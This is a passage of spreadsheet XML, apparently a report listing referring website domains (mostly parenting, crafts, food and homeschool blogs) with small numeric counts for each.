        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="370">
      <x:c r="A370" s="86" t="str">
        <x:v>https://crazylaura.com</x:v>
      </x:c>
      <x:c r="B370" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C370" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="371">
      <x:c r="A371" s="86" t="str">
        <x:v>https://popsugar.com</x:v>
      </x:c>
      <x:c r="B371" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C371" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="372">
      <x:c r="A372" s="86" t="str">
        <x:v>https://tumblr.com</x:v>
      </x:c>
      <x:c r="B372" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C372" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="373">
      <x:c r="A373" s="86" t="str">
        <x:v>https://mommyevolution.com</x:v>
      </x:c>
      <x:c r="B373" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C373" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="374">
      <x:c r="A374" s="86" t="str">
        <x:v>https://momooze.com</x:v>
      </x:c>
      <x:c r="B374" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C374" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="375">
      <x:c r="A375" s="86" t="str">
        <x:v>https://larger.io</x:v>
      </x:c>
      <x:c r="B375" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C375" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="376">
      <x:c r="A376" s="86" t="str">
        <x:v>https://homanathome.com</x:v>
      </x:c>
      <x:c r="B376" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C376" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="377">
      <x:c r="A377" s="86" t="str">
        <x:v>https://widgeo.net</x:v>
      </x:c>
      <x:c r="B377" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C377" s="86" t="str">
        <x:v>2</x:v>
      </x:c>
    </x:row>
    <x:row r="378">
      <x:c r="A378" s="86" t="str">
        <x:v>https://earthfriendlytips.com</x:v>
      </x:c>
      <x:c r="B378" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C378" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="379">
      <x:c r="A379" s="86" t="str">
        <x:v>https://lkmakhlakulkarimah.co.id</x:v>
      </x:c>
      <x:c r="B379" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C379" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="380">
      <x:c r="A380" s="86" t="str">
        <x:v>https://eatsimply.co.uk</x:v>
      </x:c>
      <x:c r="B380" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C380" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="381">
      <x:c r="A381" s="86" t="str">
        <x:v>https://picklebums.com</x:v>
      </x:c>
      <x:c r="B381" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C381" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="382">
      <x:c r="A382" s="86" t="str">
        <x:v>https://traciefobes.com</x:v>
      </x:c>
      <x:c r="B382" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C382" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="383">
      <x:c r="A383" s="86" t="str">
        <x:v>https://philophrosyne.com</x:v>
      </x:c>
      <x:c r="B383" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C383" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="384">
      <x:c r="A384" s="86" t="str">
        <x:v>https://kbhwriting.com</x:v>
      </x:c>
      <x:c r="B384" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C384" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="385">
      <x:c r="A385" s="86" t="str">
        <x:v>https://halal-foundation.com</x:v>
      </x:c>
      <x:c r="B385" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C385" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="386">
      <x:c r="A386" s="86" t="str">
        <x:v>https://teesvg.com</x:v>
      </x:c>
      <x:c r="B386" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C386" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="387">
      <x:c r="A387" s="86" t="str">
        <x:v>https://sarahtitus.com</x:v>
      </x:c>
      <x:c r="B387" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C387" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="388">
      <x:c r="A388" s="86" t="str">
        <x:v>https://studiomedicovisnatur.it</x:v>
      </x:c>
      <x:c r="B388" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C388" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="389">
      <x:c r="A389" s="86" t="str">
        <x:v>https://mamacheaps.com</x:v>
      </x:c>
      <x:c r="B389" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C389" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="390">
      <x:c r="A390" s="86" t="str">
        <x:v>https://budgetingonadime.com</x:v>
      </x:c>
      <x:c r="B390" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C390" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="391">
      <x:c r="A391" s="86" t="str">
        <x:v>https://sassmagazine.com</x:v>
      </x:c>
      <x:c r="B391" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C391" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="392">
      <x:c r="A392" s="86" t="str">
        <x:v>https://dressesanddinosaurs.com</x:v>
      </x:c>
      <x:c r="B392" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C392" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="393">
      <x:c r="A393" s="86" t="str">
        <x:v>https://ispyfabulous.com</x:v>
      </x:c>
      <x:c r="B393" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C393" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="394">
      <x:c r="A394" s="86" t="str">
        <x:v>https://fobwp.com</x:v>
      </x:c>
      <x:c r="B394" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C394" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="395">
      <x:c r="A395" s="86" t="str">
        <x:v>https://topmomsideas.com</x:v>
      </x:c>
      <x:c r="B395" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C395" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="396">
      <x:c r="A396" s="86" t="str">
        <x:v>https://gamera.us</x:v>
      </x:c>
      <x:c r="B396" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C396" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="397">
      <x:c r="A397" s="86" t="str">
        <x:v>https://foodnservice.com</x:v>
      </x:c>
      <x:c r="B397" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C397" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="398">
      <x:c r="A398" s="86" t="str">
        <x:v>https://toptohigh.com</x:v>
      </x:c>
      <x:c r="B398" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C398" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="399">
      <x:c r="A399" s="86" t="str">
        <x:v>https://littlegoldpixel.com</x:v>
      </x:c>
      <x:c r="B399" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C399" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="400">
      <x:c r="A400" s="86" t="str">
        <x:v>https://utc-strassburg.at</x:v>
      </x:c>
      <x:c r="B400" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C400" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="401">
      <x:c r="A401" s="86" t="str">
        <x:v>https://mymommystyle.com</x:v>
      </x:c>
      <x:c r="B401" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C401" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="402">
      <x:c r="A402" s="86" t="str">
        <x:v>https://cereja-avocat.com</x:v>
      </x:c>
      <x:c r="B402" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C402" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="403">
      <x:c r="A403" s="86" t="str">
        <x:v>https://acraftylife.com</x:v>
      </x:c>
      <x:c r="B403" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C403" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="404">
      <x:c r="A404" s="86" t="str">
        <x:v>https://tasteforlife.com</x:v>
      </x:c>
      <x:c r="B404" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C404" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="405">
      <x:c r="A405" s="86" t="str">
        <x:v>https://rsbdebt.co.za</x:v>
      </x:c>
      <x:c r="B405" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C405" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="406">
      <x:c r="A406" s="86" t="str">
        <x:v>https://embarkonthejourney.com</x:v>
      </x:c>
      <x:c r="B406" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C406" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="407">
      <x:c r="A407" s="86" t="str">
        <x:v>https://airchildcare.com</x:v>
      </x:c>
      <x:c r="B407" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C407" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="408">
      <x:c r="A408" s="86" t="str">
        <x:v>https://localanchor.com</x:v>
      </x:c>
      <x:c r="B408" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C408" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="409">
      <x:c r="A409" s="86" t="str">
        <x:v>https://thistinybluehouse.com</x:v>
      </x:c>
      <x:c r="B409" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C409" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="410">
      <x:c r="A410" s="86" t="str">
        <x:v>https://lovetabitha.com</x:v>
      </x:c>
      <x:c r="B410" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C410" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="411">
      <x:c r="A411" s="86" t="str">
        <x:v>https://sim-system.co.jp</x:v>
      </x:c>
      <x:c r="B411" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C411" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="412">
      <x:c r="A412" s="86" t="str">
        <x:v>https://prairierootshomeschool.com</x:v>
      </x:c>
      <x:c r="B412" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C412" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="413">
      <x:c r="A413" s="86" t="str">
        <x:v>https://hobbyscool.com</x:v>
      </x:c>
      <x:c r="B413" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C413" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="414">
      <x:c r="A414" s="86" t="str">
        <x:v>https://theinspirationedit.com</x:v>
      </x:c>
      <x:c r="B414" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C414" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="415">
      <x:c r="A415" s="86" t="str">
        <x:v>https://totlessons.com</x:v>
      </x:c>
      <x:c r="B415" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C415" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="416">
      <x:c r="A416" s="86" t="str">
        <x:v>https://pineapplepaperco.com</x:v>
      </x:c>
      <x:c r="B416" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C416" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="417">
      <x:c r="A417" s="86" t="str">
        <x:v>https://teacherwebshelf.com</x:v>
      </x:c>
      <x:c r="B417" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C417" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="418">
      <x:c r="A418" s="86" t="str">
        <x:v>https://kaydeerunkel.com</x:v>
      </x:c>
      <x:c r="B418" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C418" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="419">
      <x:c r="A419" s="86" t="str">
        <x:v>https://lorenaylennox.com</x:v>
      </x:c>
      <x:c r="B419" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C419" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="420">
      <x:c r="A420" s="86" t="str">
        <x:v>https://freubelweb.nl</x:v>
      </x:c>
      <x:c r="B420" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C420" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="421">
      <x:c r="A421" s="86" t="str">
        <x:v>https://starcourts.com</x:v>
      </x:c>
      <x:c r="B421" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C421" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="422">
      <x:c r="A422" s="86" t="str">
        <x:v>https://pchome.com.tw</x:v>
      </x:c>
      <x:c r="B422" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C422" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="423">
      <x:c r="A423" s="86" t="str">
        <x:v>https://schnorro.de</x:v>
      </x:c>
      <x:c r="B423" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C423" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="424">
      <x:c r="A424" s="86" t="str">
        <x:v>https://adrilikes.com</x:v>
      </x:c>
      <x:c r="B424" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C424" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="425">
      <x:c r="A425" s="86" t="str">
        <x:v>https://astorapiaries.com</x:v>
      </x:c>
      <x:c r="B425" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C425" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="426">
      <x:c r="A426" s="86" t="str">
        <x:v>https://hessunacademy.com</x:v>
      </x:c>
      <x:c r="B426" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C426" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="427">
      <x:c r="A427" s="86" t="str">
        <x:v>https://csculture.com</x:v>
      </x:c>
      <x:c r="B427" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C427" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="428">
      <x:c r="A428" s="86" t="str">
        <x:v>https://ideaaschool.com</x:v>
      </x:c>
      <x:c r="B428" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C428" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="429">
      <x:c r="A429" s="86" t="str">
        <x:v>https://lofnt.com</x:v>
      </x:c>
      <x:c r="B429" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C429" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="430">
      <x:c r="A430" s="86" t="str">
        <x:v>https://learngrowaspire.com</x:v>
      </x:c>
      <x:c r="B430" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C430" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="431">
      <x:c r="A431" s="86" t="str">
        <x:v>https://byamandakay.com</x:v>
      </x:c>
      <x:c r="B431" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C431" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="432">
      <x:c r="A432" s="86" t="str">
        <x:v>https://whblygg.com</x:v>
      </x:c>
      <x:c r="B432" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C432" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="433">
      <x:c r="A433" s="86" t="str">
        <x:v>https://raisedonreadalouds.com</x:v>
      </x:c>
      <x:c r="B433" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C433" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="434">
      <x:c r="A434" s="86" t="str">
        <x:v>https://seniorlivingmedia.com</x:v>
      </x:c>
      <x:c r="B434" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C434" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="435">
      <x:c r="A435" s="86" t="str">
        <x:v>https://modernmomlife.com</x:v>
      </x:c>
      <x:c r="B435" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C435" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="436">
      <x:c r="A436" s="86" t="str">
        <x:v>https://themommyhoodclub.com</x:v>
      </x:c>
      <x:c r="B436" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C436" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="437">
      <x:c r="A437" s="86" t="str">
        <x:v>https://janeskitchenmiracles.com</x:v>
      </x:c>
      <x:c r="B437" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C437" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="438">
      <x:c r="A438" s="86" t="str">
        <x:v>https://13.126.73.67</x:v>
      </x:c>
      <x:c r="B438" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C438" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="439">
      <x:c r="A439" s="86" t="str">
        <x:v>https://cedbi.org</x:v>
      </x:c>
      <x:c r="B439" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C439" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="440">
      <x:c r="A440" s="86" t="str">
        <x:v>https://allgoodschools.com</x:v>
      </x:c>
      <x:c r="B440" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C440" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="441">
      <x:c r="A441" s="86" t="str">
        <x:v>https://mamaoffive.com</x:v>
      </x:c>
      <x:c r="B441" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C441" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="442">
      <x:c r="A442" s="86" t="str">
        <x:v>https://lovefreebie.com</x:v>
      </x:c>
      <x:c r="B442" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C442" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="443">
      <x:c r="A443" s="86" t="str">
        <x:v>https://lifehacker.com</x:v>
      </x:c>
      <x:c r="B443" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C443" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="444">
      <x:c r="A444" s="86" t="str">
        <x:v>https://jakobwilmer.com</x:v>
      </x:c>
      <x:c r="B444" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C444" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="445">
      <x:c r="A445" s="86" t="str">
        <x:v>https://pea88.com</x:v>
      </x:c>
      <x:c r="B445" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C445" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="446">
      <x:c r="A446" s="86" t="str">
        <x:v>https://listlunatic.com</x:v>
      </x:c>
      <x:c r="B446" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C446" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="447">
      <x:c r="A447" s="86" t="str">
        <x:v>https://thesweetestpart.com</x:v>
      </x:c>
      <x:c r="B447" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C447" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="448">
      <x:c r="A448" s="86" t="str">
        <x:v>https://jewelswandering.com</x:v>
      </x:c>
      <x:c r="B448" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C448" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="449">
      <x:c r="A449" s="86" t="str">
        <x:v>https://craftskidslove.com</x:v>
      </x:c>
      <x:c r="B449" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C449" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="450">
      <x:c r="A450" s="86" t="str">
        <x:v>https://longwaitforisabella.com</x:v>
      </x:c>
      <x:c r="B450" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C450" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="451">
      <x:c r="A451" s="86" t="str">
        <x:v>https://koa.com</x:v>
      </x:c>
      <x:c r="B451" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C451" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="452">
      <x:c r="A452" s="86" t="str">
        <x:v>https://perfectionpending.net</x:v>
      </x:c>
      <x:c r="B452" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C452" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="453">
      <x:c r="A453" s="86" t="str">
        <x:v>https://labbeproducciones.cl</x:v>
      </x:c>
      <x:c r="B453" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C453" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="454">
      <x:c r="A454" s="86" t="str">
        <x:v>https://stupidsimpleseo.co</x:v>
      </x:c>
      <x:c r="B454" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C454" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="455">
      <x:c r="A455" s="86" t="str">
        <x:v>https://czidro.hu</x:v>
      </x:c>
      <x:c r="B455" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C455" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="456">
      <x:c r="A456" s="86" t="str">
        <x:v>https://mysillysquirts.com</x:v>
      </x:c>
      <x:c r="B456" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C456" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="457">
      <x:c r="A457" s="86" t="str">
        <x:v>https://panmastery.com</x:v>
      </x:c>
      <x:c r="B457" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C457" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="458">
      <x:c r="A458" s="86" t="str">
        <x:v>https://pistachioproject.com</x:v>
      </x:c>
      <x:c r="B458" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C458" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="459">
      <x:c r="A459" s="86" t="str">
        <x:v>https://wonderhouseoflittles.com</x:v>
      </x:c>
      <x:c r="B459" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C459" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="460">
      <x:c r="A460" s="86" t="str">
        <x:v>https://messforless.net</x:v>
      </x:c>
      <x:c r="B460" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C460" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="461">
      <x:c r="A461" s="86" t="str">
        <x:v>https://wixsite.com</x:v>
      </x:c>
      <x:c r="B461" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C461" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="462">
      <x:c r="A462" s="86" t="str">
        <x:v>https://livinglowkey.com</x:v>
      </x:c>
      <x:c r="B462" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C462" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="463">
      <x:c r="A463" s="86" t="str">
        <x:v>https://makingmommas.com</x:v>
      </x:c>
      <x:c r="B463" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C463" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="464">
      <x:c r="A464" s="86" t="str">
        <x:v>https://yandex.com.tr</x:v>
      </x:c>
      <x:c r="B464" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C464" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="465">
      <x:c r="A465" s="86" t="str">
        <x:v>https://velktech.com</x:v>
      </x:c>
      <x:c r="B465" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C465" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="466">
      <x:c r="A466" s="86" t="str">
        <x:v>https://homeschoolpreschool.net</x:v>
      </x:c>
      <x:c r="B466" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C466" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="467">
      <x:c r="A467" s="86" t="str">
        <x:v>https://foodie-haven.com</x:v>
      </x:c>
      <x:c r="B467" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C467" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="468">
      <x:c r="A468" s="86" t="str">
        <x:v>https://webreus.net</x:v>
      </x:c>
      <x:c r="B468" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C468" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="469">
      <x:c r="A469" s="86" t="str">
        <x:v>https://cookingadventures.blog</x:v>
      </x:c>
      <x:c r="B469" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C469" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="470">
      <x:c r="A470" s="86" t="str">
        <x:v>https://rockyourhomeschool.net</x:v>
      </x:c>
      <x:c r="B470" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C470" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="471">
      <x:c r="A471" s="86" t="str">
        <x:v>https://sassychopsticks.com</x:v>
      </x:c>
      <x:c r="B471" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C471" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="472">
      <x:c r="A472" s="86" t="str">
        <x:v>https://kairosgroupau.com</x:v>
      </x:c>
      <x:c r="B472" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C472" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="473">
      <x:c r="A473" s="86" t="str">
        <x:v>https://luckylittlelearners.com</x:v>
      </x:c>
      <x:c r="B473" s="86" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="C473" s="86" t="str">
        <x:v>1</x:v>
      </x:c>
    </x:row>
    <x:row r="474">
      <x:c r="A474" s="86" t="str">
        <x:v>https://we3travel.com</x:v>
      </x:c>
      <x:c r="B474" s="86" t="str">
        <x:v>0</x:v>
